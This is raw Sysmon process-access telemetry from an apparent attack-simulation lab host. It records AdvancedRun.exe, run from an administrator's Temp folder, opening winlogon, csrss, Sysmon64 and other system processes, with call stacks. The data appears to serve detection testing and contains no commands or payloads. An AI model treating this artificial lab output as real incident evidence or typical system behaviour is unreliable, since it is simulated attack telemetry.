10341000x80000000000000004078640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.921{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.921{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.919{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.919{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2
10341000x80000000000000004078628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078625Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078624Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
